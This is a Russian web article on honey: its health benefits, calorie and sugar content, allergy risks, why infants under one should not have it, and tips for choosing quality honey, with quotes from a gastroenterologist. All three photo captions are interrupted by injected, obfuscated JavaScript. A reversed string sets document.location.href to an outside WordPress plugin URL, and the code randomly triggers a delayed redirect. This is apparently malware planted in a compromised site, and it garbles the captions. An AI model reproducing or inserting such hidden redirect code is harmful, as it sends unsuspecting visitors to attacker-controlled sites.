Чем полезен мёд и как выбрать самый вкусный

С приходом холодов так и тянет пить горячий чай с чем-нибудь сладким. Тягучий ароматный мёд — альтернатива конфетам и пирожным, однако злоупотреблять им не следует. Вместе с врачом-гастроэнтерологом медицинского центра «Атлас» Еленой Костырко разбираемся, чем полезен мёд и как выбрать качественный.

Полезные свойства мёда

Чем полезен мёд и как выбрать самый вкусный. Изображение номер 1

Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com

Мёд — это нектар растений, переработанный пчёлами. Он состоит из воды, двух простых сахаров — фруктозы и глюкозы, а также сложных сахаров, минералов и витаминов, белков. Люди начали употреблять мёд тысячи лет назад как лакомство и лечебное средство. Мёд содержит антиоксиданты, которые снижают риск развития сердечно-сосудистых заболеваний. По данным исследований, мёд может быть полезен при заболеваниях желудочно-кишечного тракта и служит натуральным антидепрессантом, помогает справляться с тревожностью. Мёд из нектара с эвкалиптовых и цитрусовых деревьев полезен при кашле.

 

Елена Костырко

врач-гастроэнтеролог и педиатр медицинского центра «Атлас»

— Мёд облегчает состояние при простуде, имеет противовоспалительное действие, положительно влияет на сердечно-сосудистую систему, делая сосуды более эластичными. Антиоксидантную активность обеспечивают флавоноиды и полифенолы. Компоненты мёда способны подавлять активные формы кислорода и противодействовать окислительному стрессу, одновременно восстанавливая систему антиоксидантной защиты клетки. Чем темнее мёд, тем активнее в нём антиоксиданты. Кроме того, мёд оказывает противогрибковый, противовирусный и антибактериальный эффекты.

Мёд или сахар?

Чем полезен мёд и как выбрать самый вкусный. Изображение номер 2

Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com

Мёд, как и белый сахар, относят к свободным сахарам, поэтому его употребление нужно контролировать. В одной столовой ложке мёда (21 г) содержится 64 калории и 17 г сахара. Эксперты Американской кардиологической ассоциации рекомендуют ограничивать количество свободных сахаров женщинам до 100 калорий в день. Норма для мужчин — 150 калорий в день.

Большое количество свободных сахаров в рационе приводит к избытку калорий, что может вызвать ожирение. От сладкого развивается кариес, увеличивается риск возникновения болезней сердца, инсульта и диабета второго типа. В здоровом рационе на свободный сахар должно приходиться менее 10% от общего количества потребляемой энергии.

Часто мёдом советуют заменять рафинированный сахар. Это имеет смысл при умеренном употреблении продукта — так вы получите не только углеводы из подсластителя, но ещё и витамины с минералами. Мёд слаще сахара, но в нём чуть больше углеводов и больше калорий на чайную ложку, так что сократить потребление калорий и углеводов таким образом не получится.

Аллергия на мёд

Мёд — концентрированный продукт, поэтому он может вызывать аллергию с серьёзными последствиями. Некоторые люди реагируют на определённые его компоненты, например на пчелиную пыльцу. Симптомы аллергии

  • головокружение;
  • тошнота, рвота;
  • сильное потоотделение;
  • обморок;
  • свистящее дыхание;
  • нерегулярный сердечный ритм.

 

Елена Костырко

врач-гастроэнтеролог и педиатр медицинского центра «Атлас»

— Мёд нельзя есть людям с повышенной кислотностью желудка, так как мёд может усугубить опасное состояние. Отказаться от мёда лучше и людям, страдающим от проблем с ЖКТ (гастрит, язва желудка и двенадцатиперстной кишки, панкреатит), заболеваний почек и печени, сахарного диабета. Сахар и мёд одинаково влияют на уровень глюкозы в крови.

Мёд нельзя давать детям до года, потому что он может спровоцировать ботулизм. Это серьёзное заболевание желудочно-кишечного тракта, которое вызывают споры Clostridium botulinum. Бактерии из спор могут расти и размножаться в кишечнике ребенка и выделять ботулотоксин. Заболевание встречается редко, однако последствия у него опасные: у ребёнка развиваются запор, слабость в мышцах лица, рук, ног и шеи, проблемы с дыханием, глотанием.

Как выбрать правильный мёд

Чем полезен мёд и как выбрать самый вкусный. Изображение номер 3

Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com

Существует более 320 видов мёда, все они имеют разный вкус, цвет и запах. Покупая мёд, ориентируйтесь на его вкус (если можно попробовать) и стоимость. Хороший мёд не может стоить слишком дёшево. Мёд в супермаркете может быть более низкого качества, чем мёд на рынке. А продукт с добавками, например крем-мёд, превращается в обычный десерт.

Спрашивайте у продавца, из какого региона привезён мёд, как давно его добыли из ульев. Лучше, чтобы продукт был свежий. В средней полосе России чаще всего встречается мёд из разнотравья, луговой, гречишный, акациевый. Другие виды мёда, скорее всего, привозят издалека.

 

Елена Костырко

врач-гастроэнтеролог и педиатр медицинского центра «Атлас»

— При выборе мёда следует ориентироваться на запах, а не на цвет, потому что мёд может быть очень разных оттенков. Мёд должен обладать ароматом, если же запаха нет, то перед вами фальсификат. Мёд не должен горчить или иметь карамельный привкус. Качественный мёд будет стекать с ложки медленно, тянуться и собираться внизу горкой.

Статьи по теме

Кускус на завтрак с инжиром и мёдом

Малиновый чай с мёдом

Боул из рикотты с вишней, фисташками и мёдом

Правда ли, что белый сахар вредный, и нужно ли его заменять

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector